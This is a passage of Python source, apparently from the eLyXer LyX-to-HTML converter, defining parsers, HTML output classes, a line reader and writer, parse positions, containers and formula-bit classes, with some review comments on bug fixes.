        "Parse everything, then skip past the ending line itself."
        contents = ExcludingParser.parse(self, reader)
        reader.nextline()  # consume the ending line
        return contents
class BoundedDummy(Parser):
  "Discards a bounded block wholesale, producing no contents."
  def parse(self, reader):
    "Skip every line of the container, then its ending line."
    self.parseending(reader, reader.nextline)
    reader.nextline()  # consume the ending line as well
    return []
class StringParser(Parser):
  "Reads a single line of text as the parsed contents."
  def parseheader(self, reader):
    "There is no real header; just record the starting line number."
    self.begin = reader.linenumber + 1
    return []
  def parse(self, reader):
    "Return the current line verbatim and advance past it."
    line = reader.currentline()
    reader.nextline()
    return line
class InsetParser(BoundedParser):
  "Parses a LyX inset"
  def parse(self, reader):
    "Parse inset parameters into a dictionary"
    startcommand = ContainerConfig.string['startcommand']
    # every line before the first start command (and before a blank line)
    # is a key/value parameter belonging to the inset
    while reader.currentline() != '' and not reader.currentline().startswith(startcommand):
      self.parseparameter(reader)
    return BoundedParser.parse(self, reader)
class ContainerOutput(object):
  "Base class for HTML generation from a container."
  def gethtml(self, container):
    "Abstract hook: subclasses must produce the HTML lines."
    message = 'gethtml() not implemented for ' + unicode(self)
    Trace.error(message)
  def isempty(self):
    "Report whether this output produces nothing; assume it does not."
    return False
class EmptyOutput(ContainerOutput):
  "An output that generates nothing at all."
  def gethtml(self, container):
    "Produce no HTML lines whatsoever."
    return list()
  def isempty(self):
    "Always empty, by definition."
    return True
class FixedOutput(ContainerOutput):
  "Outputs a precomputed, constant chunk of HTML."
  def gethtml(self, container):
    "Hand back the HTML already stored on the container."
    return container.html
class ContentsOutput(ContainerOutput):
  "Outputs the contents converted to HTML"
  def gethtml(self, container):
    "Return the HTML code produced by every element in the contents."
    html = []
    # a container may legitimately carry no contents at all;
    # use identity comparison with None (PEP 8), not ==
    if container.contents is None:
      return html
    for element in container.contents:
      if not hasattr(element, 'gethtml'):
        # malformed element: report and return what was built so far
        Trace.error('No html in ' + element.__class__.__name__ + ': ' + unicode(element))
        return html
      html += element.gethtml()
    return html
class TaggedOutput(ContentsOutput):
  "Outputs an HTML tag surrounding the contents."
  tag = None           # tag text, possibly with attributes ('div class="x"')
  breaklines = False   # whether to emit newlines around the tag
  empty = False        # whether to emit a self-closing tag with no contents
  def settag(self, tag, breaklines=False, empty=False):
    "Set the value for the tag and other attributes."
    self.tag = tag
    if breaklines:
      self.breaklines = breaklines
    if empty:
      self.empty = empty
    return self
  def setbreaklines(self, breaklines):
    "Set the value for breaklines."
    self.breaklines = breaklines
    return self
  def gethtml(self, container):
    "Return the HTML code: the tag wrapped around the contents."
    if self.empty:
      return [self.selfclosing(container)]
    html = [self.open(container)]
    html += ContentsOutput.gethtml(self, container)
    html.append(self.close(container))
    return html
  def open(self, container):
    "Get the opening tag line."
    if not self.checktag(container):
      return ''
    # local renamed from 'open' to stop shadowing the builtin open()
    opening = '<' + self.tag + '>'
    if self.breaklines:
      return opening + '\n'
    return opening
  def close(self, container):
    "Get the closing tag line."
    if not self.checktag(container):
      return ''
    # split() strips attributes: '</div>' even when tag is 'div class="x"'
    closing = '</' + self.tag.split()[0] + '>'
    if self.breaklines:
      return '\n' + closing + '\n'
    return closing
  def selfclosing(self, container):
    "Get the self-closing tag line."
    if not self.checktag(container):
      return ''
    selfclosing = '<' + self.tag + '/>'
    if self.breaklines:
      return selfclosing + '\n'
    return selfclosing
  def checktag(self, container):
    "Check that the tag is valid (present and non-empty)."
    if not self.tag:
      # covers both None and '' — the old separate '' check was unreachable
      Trace.error('No tag in ' + unicode(container))
      return False
    return True
class FilteredOutput(ContentsOutput):
  "Returns the output in the contents, but filtered:"
  "some strings are replaced by others."
  # NOTE(review): the second string above is a discarded expression
  # statement, not part of __doc__.
  def __init__(self):
    "Initialize the filters."
    # list of (original, replacement) pairs applied to every output line
    self.filters = []
  def addfilter(self, original, replacement):
    "Add a new filter: replace the original by the replacement."
    self.filters.append((original, replacement))
  def gethtml(self, container):
    "Return the HTML code"
    result = []
    html = ContentsOutput.gethtml(self, container)
    for line in html:
      result.append(self.filter(line))
    return result
  def filter(self, line):
    "Filter a single line with all available filters."
    # NOTE: this method name shadows the builtin filter() inside the class.
    for original, replacement in self.filters:
      if original in line:
        line = line.replace(original, replacement)
    return line
class StringOutput(ContainerOutput):
  "Produces the container's bare string as its only output line."
  def gethtml(self, container):
    "Wrap the stored string in a single-element list."
    return [container.string]
class LineReader(object):
  "Reads a file line by line"
  def __init__(self, filename):
    # accept either an already-open file object or a path to open;
    # NOTE(review): 'file' is a Python 2 builtin — assumes a py3 shim is
    # defined earlier in this module; confirm.
    if isinstance(filename, file):
      self.file = filename
    else:
      self.file = codecs.open(filename, 'rU', 'utf-8')
    self.linenumber = 1
    self.lastline = None
    self.current = None
    self.mustread = True
    self.depleted = False
    try:
      self.readline()
    except UnicodeDecodeError:
      # try compressed file
      import gzip
      self.file = gzip.open(filename, 'rb')
      self.readline()
  def setstart(self, firstline):
    "Set the first line to read."
    # fast-forward the underlying file without decoding bookkeeping
    for i in range(firstline):
      self.file.readline()
    self.linenumber = firstline
  def setend(self, lastline):
    "Set the last line to read."
    self.lastline = lastline
  def currentline(self):
    "Get the current line"
    if self.mustread:
      self.readline()
    return self.current
  def nextline(self):
    "Go to next line"
    if self.depleted:
      Trace.fatal('Read beyond file end')
    # mark the buffered line stale; actual read is deferred to currentline()
    self.mustread = True
  def readline(self):
    "Read a line from elyxer.file"
    self.current = self.file.readline()
    # gzip (and plain binary) files hand back bytes; decode to text
    if not isinstance(self.file, codecs.StreamReaderWriter):
      self.current = self.current.decode('utf-8')
    # an empty read (not even a newline) means end of file
    if len(self.current) == 0:
      self.depleted = True
    self.current = self.current.rstrip('\n\r')
    self.linenumber += 1
    self.mustread = False
    Trace.prefix = 'Line ' + unicode(self.linenumber) + ': '
    # progress heartbeat every thousand lines
    if self.linenumber % 1000 == 0:
      Trace.message('Parsing')
  def finished(self):
    "Find out if the file is finished"
    if self.lastline and self.linenumber == self.lastline:
      return True
    if self.mustread:
      self.readline()
    return self.depleted
  def close(self):
    "Close the underlying file."
    self.file.close()
class LineWriter(object):
  "Writes a file as a series of lists"
  # output file object; False until lazily opened on the first write
  file = False
  def __init__(self, filename):
    # accept an already-open file object, or a path to open lazily;
    # NOTE(review): 'file' is a Python 2 builtin — assumes a py3 shim
    # exists earlier in this module; confirm.
    if isinstance(filename, file):
      self.file = filename
      self.filename = None
    else:
      self.filename = filename
  def write(self, strings):
    "Write a list of strings"
    for string in strings:
      if not isinstance(string, basestring):
        # abort the whole batch on the first non-string element
        Trace.error('Not a string: ' + unicode(string) + ' in ' + unicode(strings))
        return
      self.writestring(string)
  def writestring(self, string):
    "Write a string"
    if not self.file:
      self.file = codecs.open(self.filename, 'w', "utf-8")
    # Python 2 stdout expects encoded bytes, not unicode
    if self.file == sys.stdout and sys.version_info < (3, 0):
      string = string.encode('utf-8')
    self.file.write(string)
  def writeline(self, line):
    "Write a line to file"
    self.writestring(line + '\n')
  def close(self):
    "Close the output file."
    self.file.close()
class Globable(object):
  """A bit of text which can be globbed (lumped together in bits).
  Methods current(), skipcurrent(), checkfor() and isout() have to be
  implemented by subclasses."""
  # when True, unclosed endings are tolerated instead of reported
  leavepending = False
  def __init__(self):
    self.endinglist = EndingList()
  def checkbytemark(self):
    "Check for a Unicode byte mark and skip it."
    if self.finished():
      return
    if ord(self.current()) == 0xfeff:
      self.skipcurrent()
  def isout(self):
    "Find out if we are out of the position yet."
    Trace.error('Unimplemented isout()')
    return True
  def current(self):
    "Return the current character."
    Trace.error('Unimplemented current()')
    return ''
  def checkfor(self, string):
    "Check for the given string in the current position."
    Trace.error('Unimplemented checkfor()')
    return False
  def finished(self):
    "Find out if the current text has finished."
    if self.isout():
      if not self.leavepending:
        self.endinglist.checkpending()
      return True
    # also considered finished when a registered ending is reached
    return self.endinglist.checkin(self)
  def skipcurrent(self):
    "Return the current character and skip it."
    Trace.error('Unimplemented skipcurrent()')
    return ''
  def glob(self, currentcheck):
    "Glob a bit of text that satisfies a check on the current char."
    glob = ''
    while not self.finished() and currentcheck():
      glob += self.skipcurrent()
    return glob
  def globalpha(self):
    "Glob a bit of alpha text"
    return self.glob(lambda: self.current().isalpha())
  def globnumber(self):
    "Glob a row of digits."
    return self.glob(lambda: self.current().isdigit())
  def isidentifier(self):
    "Return if the current character is alphanumeric or _."
    if self.current().isalnum() or self.current() == '_':
      return True
    return False
  def globidentifier(self):
    "Glob alphanumeric and _ symbols."
    return self.glob(self.isidentifier)
  def isvalue(self):
    "Return if the current character is a value character:"
    "not a bracket or a space."
    if self.current().isspace():
      return False
    if self.current() in '{}()':
      return False
    return True
  def globvalue(self):
    "Glob a value: any symbols but brackets."
    return self.glob(self.isvalue)
  def skipspace(self):
    "Skip all whitespace at current position."
    return self.glob(lambda: self.current().isspace())
  def globincluding(self, magicchar):
    "Glob a bit of text up to (including) the magic char."
    glob = self.glob(lambda: self.current() != magicchar) + magicchar
    self.skip(magicchar)
    return glob
  def globexcluding(self, excluded):
    "Glob a bit of text up until (excluding) any excluded character."
    return self.glob(lambda: self.current() not in excluded)
  def pushending(self, ending, optional = False):
    "Push a new ending to the bottom"
    self.endinglist.add(ending, optional)
  def popending(self, expected = None):
    "Pop the ending found at the current position"
    if self.isout() and self.leavepending:
      return expected
    ending = self.endinglist.pop(self)
    if expected and expected != ending:
      Trace.error('Expected ending ' + expected + ', got ' + ending)
    # consume the ending text itself
    self.skip(ending)
    return ending
  def nextending(self):
    "Return the next ending in the queue."
    nextending = self.endinglist.findending(self)
    if not nextending:
      return None
    return nextending.ending
class EndingList(object):
  "A list of position endings"
  def __init__(self):
    "Start with no endings registered."
    self.endings = []
  def add(self, ending, optional = False):
    "Add a new ending to the list"
    self.endings.append(PositionEnding(ending, optional))
  def pickpending(self, pos):
    "Pick any pending endings from a parse position."
    self.endings += pos.endinglist.endings
  def checkin(self, pos):
    "Search for an ending"
    if self.findending(pos):
      return True
    return False
  def pop(self, pos):
    "Remove the ending at the current position"
    if pos.isout():
      Trace.error('No ending out of bounds')
      return ''
    ending = self.findending(pos)
    if not ending:
      Trace.error('No ending at ' + pos.current())
      return ''
    # discard everything stacked above the matched ending
    for each in reversed(self.endings):
      self.endings.remove(each)
      if each == ending:
        return each.ending
      elif not each.optional:
        # BUGFIX: the object itself was concatenated to the message,
        # raising TypeError; convert it to text first.
        Trace.error('Removed non-optional ending ' + unicode(each))
    Trace.error('No endings left')
    return ''
  def findending(self, pos):
    "Find the ending at the current position"
    if len(self.endings) == 0:
      return None
    # scan from the innermost ending outwards; a non-optional miss stops
    # the search (the unused enumerate index was removed)
    for ending in reversed(self.endings):
      if ending.checkin(pos):
        return ending
      if not ending.optional:
        return None
    return None
  def checkpending(self):
    "Check if there are any pending endings"
    if len(self.endings) != 0:
      Trace.error('Pending ' + unicode(self) + ' left open')
  def __unicode__(self):
    "Printable representation"
    string = 'endings ['
    for ending in self.endings:
      string += unicode(ending) + ','
    if len(self.endings) > 0:
      string = string[:-1]
    return string + ']'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class PositionEnding(object):
  "A single ending mark that a parse position may run into."
  def __init__(self, ending, optional):
    "Store the ending string and whether it may be skipped."
    self.ending = ending
    self.optional = optional
  def checkin(self, pos):
    "Ask the position whether the ending is present there."
    return pos.checkfor(self.ending)
  def __unicode__(self):
    "Human-readable description of this ending."
    suffix = ' (optional)' if self.optional else ''
    return 'Ending ' + self.ending + suffix
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class Position(Globable):
  """A position in a text to parse.
  Including those in Globable, functions to implement by subclasses are:
  skip(), identifier(), extract(), isout() and current()."""
  def __init__(self):
    Globable.__init__(self)
  def skip(self, string):
    "Skip a string"
    Trace.error('Unimplemented skip()')
  def identifier(self):
    "Return an identifier for the current position."
    Trace.error('Unimplemented identifier()')
    return 'Error'
  def extract(self, length):
    "Extract the next string of the given length, or None if not enough text,"
    "without advancing the parse position."
    Trace.error('Unimplemented extract()')
    return None
  def checkfor(self, string):
    "Check for a string at the given position."
    return string == self.extract(len(string))
  def checkforlower(self, string):
    "Check for a string in lower case."
    extracted = self.extract(len(string))
    if not extracted:
      return False
    # reuse the already extracted text instead of extracting a second time
    return string.lower() == extracted.lower()
  def skipcurrent(self):
    "Return the current character and skip it."
    current = self.current()
    self.skip(current)
    return current
  def __next__(self):
    "Advance the position and return the next character."
    self.skipcurrent()
    return self.current()
  # Python 2 iterators use next(); alias it to the py3 protocol method
  if sys.version_info < (3, 0):
    next = __next__
  def checkskip(self, string):
    "Check for a string at the given position; if there, skip it"
    if not self.checkfor(string):
      return False
    self.skip(string)
    return True
  def error(self, message):
    "Show an error message and the position identifier."
    Trace.error(message + ': ' + self.identifier())
class TextPosition(Position):
  "A parse position over an in-memory string."
  def __init__(self, text):
    "Wrap the given text and skip any leading byte mark."
    Position.__init__(self)
    self.pos = 0
    self.text = text
    self.checkbytemark()
  def skip(self, string):
    "Advance the position by the length of the string."
    self.pos += len(string)
  def identifier(self):
    "Return a sample of the remaining text, marked with asterisks."
    remaining = len(self.text) - self.pos
    length = remaining if remaining < 30 else 30
    return '*' + self.text[self.pos:self.pos + length] + '*'
  def isout(self):
    "Report whether the whole text has been consumed."
    return self.pos >= len(self.text)
  def current(self):
    "Return the character at the position; assumes we are not out."
    return self.text[self.pos]
  def extract(self, length):
    "Peek at the next characters, or None when too few remain."
    if self.pos + length > len(self.text):
      return None
    return self.text[self.pos : self.pos + length]
class FilePosition(Position):
  "A parse position based on an underlying file."
  def __init__(self, filename):
    "Create the position from a file."
    Position.__init__(self)
    self.reader = LineReader(filename)
    self.pos = 0
    self.checkbytemark()
  def skip(self, string):
    "Skip a string of characters, crossing line boundaries as needed."
    length = len(string)
    while self.pos + length > len(self.reader.currentline()):
      # consume the rest of the line plus the implicit newline character
      length -= len(self.reader.currentline()) - self.pos + 1
      self.nextline()
    self.pos += length
  def currentline(self):
    "Get the current line of the underlying file."
    return self.reader.currentline()
  def nextline(self):
    "Go to the next line."
    self.reader.nextline()
    self.pos = 0
  def linenumber(self):
    "Return the line number of the file."
    return self.reader.linenumber + 1
  def identifier(self):
    "Return the current line and line number in the file."
    before = self.reader.currentline()[:self.pos - 1]
    after = self.reader.currentline()[self.pos:]
    # BUGFIX: this called the nonexistent self.getlinenumber(); the method
    # above is named linenumber(), so the old code raised AttributeError.
    return 'line ' + unicode(self.linenumber()) + ': ' + before + '*' + after
  def isout(self):
    "Find out if we are out of the text yet."
    if self.pos > len(self.reader.currentline()):
      if self.pos > len(self.reader.currentline()) + 1:
        Trace.error('Out of the line ' + self.reader.currentline() + ': ' + unicode(self.pos))
      self.nextline()
    return self.reader.finished()
  def current(self):
    "Return the current character, assuming we are not out."
    # the position just past the line's last character is the newline
    if self.pos == len(self.reader.currentline()):
      return '\n'
    if self.pos > len(self.reader.currentline()):
      Trace.error('Out of the line ' + self.reader.currentline() + ': ' + unicode(self.pos))
      return '*'
    return self.reader.currentline()[self.pos]
  def extract(self, length):
    "Extract the next string of the given length, or None if not enough text."
    if self.pos + length > len(self.reader.currentline()):
      return None
    return self.reader.currentline()[self.pos : self.pos + length]
class Container(object):
  "A container for text and objects in a lyx file"
  # part key for numbered/labelled parts, set by processors
  partkey = None
  # enclosing container, or None at the top level
  parent = None
  # starting line number in the source, when known
  begin = None
  def __init__(self):
    self.contents = list()
  def process(self):
    "Process contents"
    pass
  def gethtml(self):
    "Get the resulting HTML"
    html = self.output.gethtml(self)
    # outputs must return lists of lines; tolerate (and report) raw strings
    if isinstance(html, basestring):
      Trace.error('Raw string ' + html)
      html = [html]
    return self.escapeall(html)
  def escapeall(self, lines):
    "Escape all lines in an array according to the output options."
    result = []
    for line in lines:
      if Options.html:
        line = self.escape(line, EscapeConfig.html)
      if Options.iso885915:
        line = self.escape(line, EscapeConfig.iso885915)
        line = self.escapeentities(line)
      elif not Options.unicode:
        line = self.escape(line, EscapeConfig.nonunicode)
      result.append(line)
    return result
  def escape(self, line, replacements = EscapeConfig.entities):
    "Escape a line with replacements from elyxer.a map"
    pieces = sorted(replacements.keys())
    # do them in order
    for piece in pieces:
      if piece in line:
        line = line.replace(piece, replacements[piece])
    return line
  def escapeentities(self, line):
    "Escape all Unicode characters to HTML entities."
    result = ''
    pos = TextPosition(line)
    while not pos.finished():
      if ord(pos.current()) > 128:
        codepoint = hex(ord(pos.current()))
        # 0xd835 is a high surrogate (mathematical alphanumerics);
        # combine it with the following low surrogate
        if codepoint == '0xd835':
          codepoint = hex(ord(next(pos)) + 0xf800)
        result += '&#' + codepoint[1:] + ';'
      else:
        result += pos.current()
      pos.skipcurrent()
    return result
  def searchall(self, type):
    "Search for all embedded containers of a given type"
    # NOTE: local 'list' shadows the builtin within this method
    list = []
    self.searchprocess(type, lambda container: list.append(container))
    return list
  def searchremove(self, type):
    "Search for all containers of a type and remove them"
    list = self.searchall(type)
    for container in list:
      container.parent.contents.remove(container)
    return list
  def searchprocess(self, type, process):
    "Search for elements of a given type and process them"
    self.locateprocess(lambda container: isinstance(container, type), process)
  def locateprocess(self, locate, process):
    "Search for all embedded containers and process them"
    # depth-first: children are processed before the matching parent
    for container in self.contents:
      container.locateprocess(locate, process)
      if locate(container):
        process(container)
  def recursivesearch(self, locate, recursive, process):
    "Perform a recursive search in the container."
    for container in self.contents:
      if recursive(container):
        container.recursivesearch(locate, recursive, process)
      if locate(container):
        process(container)
  def extracttext(self):
    "Extract all text from elyxer.allowed containers."
    result = ''
    constants = ContainerExtractor(ContainerConfig.extracttext).extract(self)
    for constant in constants:
      result += constant.string
    return result
  def group(self, index, group, isingroup):
    "Group some adjoining elements into a group"
    if index >= len(self.contents):
      return
    # 'grouped' marks elements already claimed by a previous group
    if hasattr(self.contents[index], 'grouped'):
      return
    while index < len(self.contents) and isingroup(self.contents[index]):
      self.contents[index].grouped = True
      group.contents.append(self.contents[index])
      self.contents.pop(index)
    self.contents.insert(index, group)
  def remove(self, index):
    "Remove a container but leave its contents"
    container = self.contents[index]
    self.contents.pop(index)
    # popping from the end and inserting at index preserves original order
    while len(container.contents) > 0:
      self.contents.insert(index, container.contents.pop())
  def tree(self, level = 0):
    "Show in a tree"
    Trace.debug(" " * level + unicode(self))
    for container in self.contents:
      container.tree(level + 1)
  def getparameter(self, name):
    "Get the value of a parameter, if present."
    # NOTE(review): assumes self.parameters was set by the parser — confirm
    if not name in self.parameters:
      return None
    return self.parameters[name]
  def getparameterlist(self, name):
    "Get the value of a comma-separated parameter as a list."
    paramtext = self.getparameter(name)
    if not paramtext:
      return []
    return paramtext.split(',')
  def hasemptyoutput(self):
    "Check if the parent's output is empty."
    current = self.parent
    while current:
      if current.output.isempty():
        return True
      current = current.parent
    return False
  def __unicode__(self):
    "Get a description"
    if not self.begin:
      return self.__class__.__name__
    return self.__class__.__name__ + '@' + unicode(self.begin)
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class BlackBox(Container):
  "A container that consumes its input and renders nothing."
  def __init__(self):
    "Wire up a lone-command parser and an empty output."
    self.parser = LoneCommand()
    self.output = EmptyOutput()
    self.contents = []
class LyXFormat(BlackBox):
  "Read the lyxformat command"
  def process(self):
    "Show warning if version < 276"
    # NOTE(review): assumes self.header[1] holds the format number as set
    # by the parsing machinery — confirm against the parser.
    version = int(self.header[1])
    if version < 276:
      Trace.error('Warning: unsupported old format version ' + str(version))
    # also warn when the document is newer than this converter supports
    if version > int(GeneralConfig.version['lyxformat']):
      Trace.error('Warning: unsupported new format version ' + str(version))
class StringContainer(Container):
  "A container for a single string"
  # raw parsed line, consumed (and cleared) by process()
  parsed = None
  def __init__(self):
    self.parser = StringParser()
    self.output = StringOutput()
    self.string = ''
  def process(self):
    "Replace special chars from elyxer.the contents."
    if self.parsed:
      self.string = self.replacespecial(self.parsed)
      self.parsed = None
  def replacespecial(self, line):
    "Replace all special chars from elyxer.a line"
    replaced = self.escape(line, EscapeConfig.entities)
    replaced = self.changeline(replaced)
    # a leftover start command means something was not recognized
    if ContainerConfig.string['startcommand'] in replaced and len(replaced) > 1:
      # unprocessed commands
      if self.begin:
        message = 'Unknown command at ' + unicode(self.begin) + ': '
      else:
        message = 'Unknown command: '
      Trace.error(message + replaced.strip())
    return replaced
  def changeline(self, line):
    "Escape special characters, and commands when one is present."
    line = self.escape(line, EscapeConfig.chars)
    if not ContainerConfig.string['startcommand'] in line:
      return line
    line = self.escape(line, EscapeConfig.commands)
    return line
  def extracttext(self):
    "Return all text."
    return self.string
  def __unicode__(self):
    "Return a printable representation."
    result = 'StringContainer'
    if self.begin:
      result += '@' + unicode(self.begin)
    # truncate long strings to 15 chars with an ellipsis
    ellipsis = '...'
    if len(self.string.strip()) <= 15:
      ellipsis = ''
    return result + ' (' + self.string.strip()[:15] + ellipsis + ')'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class Constant(StringContainer):
  "A fixed string wrapped as a container."
  def __init__(self, text):
    "Store the text directly; no parsing is ever needed."
    self.contents = []
    self.string = text
    self.output = StringOutput()
  def __unicode__(self):
    "Printable form showing the stored string."
    return 'Constant: ' + self.string
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class TaggedText(Container):
  "A container rendered as text wrapped inside an HTML tag."
  output = None
  def __init__(self):
    "Set up a text parser and a tagged output."
    self.parser = TextParser(self)
    self.output = TaggedOutput()
  def complete(self, contents, tag, breaklines=False):
    "Fill in contents and tag, then return self for chaining."
    self.output.tag = tag
    self.output.breaklines = breaklines
    self.contents = contents
    return self
  def constant(self, text, tag, breaklines=False):
    "Build the tagged text around a single constant string."
    return self.complete([Constant(text)], tag, breaklines)
  def __unicode__(self):
    "Printable description of the tag, if any."
    if not hasattr(self.output, 'tag'):
      return 'Emtpy tagged text'
    if not self.output.tag:
      return 'Tagged <unknown tag>'
    return 'Tagged <' + self.output.tag + '>'
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class DocumentParameters(object):
  "Global parameters for the document."
  # PDF metadata
  pdftitle = None
  # layout and output flags
  indentstandard = False
  outputchanges = False
  displaymode = False
  # section numbering and depth limits
  tocdepth = 10
  startinglevel = 0
  maxdepth = 10
  # localization and bibliography
  language = None
  bibliography = None
class FormulaParser(Parser):
  "Parses a formula"
  def parseheader(self, reader):
    "See if the formula is inlined"
    self.begin = reader.linenumber + 1
    type = self.parsetype(reader)
    if not type:
      # the type marker may be on the following line
      reader.nextline()
      type = self.parsetype(reader)
      if not type:
        Trace.error('Unknown formula type in ' + reader.currentline().strip())
        return ['unknown']
    return [type]
  def parsetype(self, reader):
    "Get the formula type from the first line."
    if reader.currentline().find(FormulaConfig.starts['simple']) >= 0:
      return 'inline'
    if reader.currentline().find(FormulaConfig.starts['complex']) >= 0:
      return 'block'
    if reader.currentline().find(FormulaConfig.starts['unnumbered']) >= 0:
      return 'block'
    if reader.currentline().find(FormulaConfig.starts['beginbefore']) >= 0:
      return 'numbered'
    return None
  def parse(self, reader):
    "Parse the formula until the end"
    formula = self.parseformula(reader)
    # anything left before the ending line should have been consumed
    while not reader.currentline().startswith(self.ending):
      stripped = reader.currentline().strip()
      if len(stripped) > 0:
        Trace.error('Unparsed formula line ' + stripped)
      reader.nextline()
    reader.nextline()
    return formula
  def parseformula(self, reader):
    "Parse the formula contents"
    simple = FormulaConfig.starts['simple']
    if simple in reader.currentline():
      rest = reader.currentline().split(simple, 1)[1]
      if simple in rest:
        # formula is $...$
        return self.parsesingleliner(reader, simple, simple)
      # formula is multiline $...$
      return self.parsemultiliner(reader, simple, simple)
    if FormulaConfig.starts['complex'] in reader.currentline():
      # formula of the form \[...\]
      return self.parsemultiliner(reader, FormulaConfig.starts['complex'],
          FormulaConfig.endings['complex'])
    beginbefore = FormulaConfig.starts['beginbefore']
    beginafter = FormulaConfig.starts['beginafter']
    if beginbefore in reader.currentline():
      if reader.currentline().strip().endswith(beginafter):
        current = reader.currentline().strip()
        endsplit = current.split(beginbefore)[1].split(beginafter)
        # reconstruct the \begin{env} and matching \end{env} pieces
        startpiece = beginbefore + endsplit[0] + beginafter
        endbefore = FormulaConfig.endings['endbefore']
        endafter = FormulaConfig.endings['endafter']
        endpiece = endbefore + endsplit[0] + endafter
        return startpiece + self.parsemultiliner(reader, startpiece, endpiece) + endpiece
      Trace.error('Missing ' + beginafter + ' in ' + reader.currentline())
      return ''
    begincommand = FormulaConfig.starts['command']
    beginbracket = FormulaConfig.starts['bracket']
    if begincommand in reader.currentline() and beginbracket in reader.currentline():
      endbracket = FormulaConfig.endings['bracket']
      return self.parsemultiliner(reader, beginbracket, endbracket)
    Trace.error('Formula beginning ' + reader.currentline() + ' is unknown')
    return ''
  def parsesingleliner(self, reader, start, ending):
    "Parse a formula in one line"
    line = reader.currentline().strip()
    if not start in line:
      Trace.error('Line ' + line + ' does not contain formula start ' + start)
      return ''
    if not line.endswith(ending):
      Trace.error('Formula ' + line + ' does not end with ' + ending)
      return ''
    # keep only the text between the start and ending markers
    index = line.index(start)
    rest = line[index + len(start):-len(ending)]
    reader.nextline()
    return rest
  def parsemultiliner(self, reader, start, ending):
    "Parse a formula in multiple lines"
    formula = ''
    line = reader.currentline()
    if not start in line:
      Trace.error('Line ' + line.strip() + ' does not contain formula start ' + start)
      return ''
    index = line.index(start)
    line = line[index + len(start):].strip()
    # accumulate full lines until one carries the ending marker
    while not line.endswith(ending):
      formula += line + '\n'
      reader.nextline()
      line = reader.currentline()
    formula += line[:-len(ending)]
    reader.nextline()
    return formula
class MacroParser(FormulaParser):
  "Parses a formula macro definition."
  def parseheader(self, reader):
    "Macros are always treated as inline formulas."
    self.begin = reader.linenumber + 1
    return ['inline']
  def parse(self, reader):
    "Read the full macro body and consume the ending line."
    body = self.parsemultiliner(reader, self.parent.start, self.ending)
    reader.nextline()
    return body
class FormulaBit(Container):
  "A bit of a formula"
  # semantic type: 'alpha', 'number', 'font', or None when unclassified
  type = None
  # rendered size; recomputed as the max of the contents (see computesize)
  size = 1
  # the original LaTeX text this bit was parsed from
  original = ''
  def __init__(self):
    "The formula bit type can be 'alpha', 'number', 'font'."
    self.contents = []
    self.output = ContentsOutput()
  def setfactory(self, factory):
    "Set the internal formula factory."
    self.factory = factory
    return self
  def add(self, bit):
    "Add any kind of formula bit already processed"
    self.contents.append(bit)
    # keep the accumulated original text in sync with the contents
    self.original += bit.original
    bit.parent = self
  def skiporiginal(self, string, pos):
    "Skip a string and add it to the original formula"
    self.original += string
    if not pos.checkskip(string):
      Trace.error('String ' + string + ' not at ' + pos.identifier())
  def computesize(self):
    "Compute the size of the bit as the max of the sizes of all contents."
    if len(self.contents) == 0:
      return 1
    self.size = max([element.size for element in self.contents])
    return self.size
  def clone(self):
    "Return a copy of itself."
    # reparse the original text to get an independent tree
    return self.factory.parseformula(self.original)
  def __unicode__(self):
    "Get a string representation"
    return self.__class__.__name__ + ' read in ' + self.original
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class TaggedBit(FormulaBit):
  "A formula bit rendered inside an HTML tag."
  def constant(self, constant, tag):
    "Wrap a single constant string in the given tag."
    self.output = TaggedOutput().settag(tag)
    self.add(FormulaConstant(constant))
    return self
  def complete(self, contents, tag, breaklines = False):
    "Adopt ready-made contents and render them inside the tag."
    self.output = TaggedOutput().settag(tag, breaklines)
    self.contents = contents
    return self
  def selfcomplete(self, tag):
    "Use a self-closing tag with no contents at all (as in <hr/>)."
    self.output = TaggedOutput().settag(tag, empty = True)
    return self
class FormulaConstant(Constant):
  "A fixed string appearing inside a formula."
  def __init__(self, string):
    "Store the string and initialize the formula-bit bookkeeping."
    Constant.__init__(self, string)
    self.original = string
    self.size = 1
    self.type = None
  def computesize(self):
    "A constant always has size 1."
    return self.size
  def clone(self):
    "Produce an independent copy carrying the same original text."
    return FormulaConstant(self.original)
  def __unicode__(self):
    "Printable representation."
    return 'Formula constant: ' + self.string
  if sys.version_info >= (3, 0):
    __str__ = __unicode__
class RawText(FormulaBit):
  "A run of plain alphabetic text inside a formula."
  def detect(self, pos):
    "Raw text starts wherever an alphabetic character appears."
    return pos.current().isalpha()
  def parsebit(self, pos):
    "Glob the whole alphabetic run into a single constant."
    self.add(FormulaConstant(pos.globalpha()))
    self.type = 'alpha'
class FormulaSymbol(FormulaBit):
  "A single symbol character inside a formula."
  modified = FormulaConfig.modified
  unmodified = FormulaConfig.unmodified['characters']
  def detect(self, pos):
    "A symbol is any character from the modified or unmodified sets."
    char = pos.current()
    return char in FormulaSymbol.unmodified or char in FormulaSymbol.modified
  def parsebit(self, pos):
    "Translate the symbol (when needed) and record it."
    char = pos.current()
    if char in FormulaSymbol.unmodified:
      # passes through unchanged
      self.addsymbol(char, pos)
    elif char in FormulaSymbol.modified:
      # replaced by its configured translation
      self.addsymbol(FormulaSymbol.modified[char], pos)
    else:
      Trace.error('Symbol ' + char + ' not found')
  def addsymbol(self, symbol, pos):
    "Record the original character and append the translated symbol."
    self.skiporiginal(pos.current(), pos)
    self.contents.append(FormulaConstant(symbol))
class FormulaNumber(FormulaBit):
  "A string of digits in a formula."
  def detect(self, pos):
    "Numbers start at any digit."
    return pos.current().isdigit()
  def parsebit(self, pos):
    "Glob the whole run of digits into one constant."
    # globnumber() is exactly glob(isdigit) on the position
    digits = pos.globnumber()
    self.add(FormulaConstant(digits))
    self.type = 'number'
class Comment(FormulaBit):
  "A LaTeX comment: % to the end of the line."
  start = FormulaConfig.starts['comment']
  def detect(self, pos):
    "A comment begins at the comment-start character."
    return pos.current() == self.start
  def parsebit(self, pos):
    "Swallow everything up to and including the newline."
    self.original += pos.globincluding('\n')
class WhiteSpace(FormulaBit):
  "A stretch of whitespace inside a formula."
  def detect(self, pos):
    "Whitespace starts at any space character."
    return pos.current().isspace()
  def parsebit(self, pos):
    "Consume the whole run of whitespace."
    self.original += pos.skipspace()
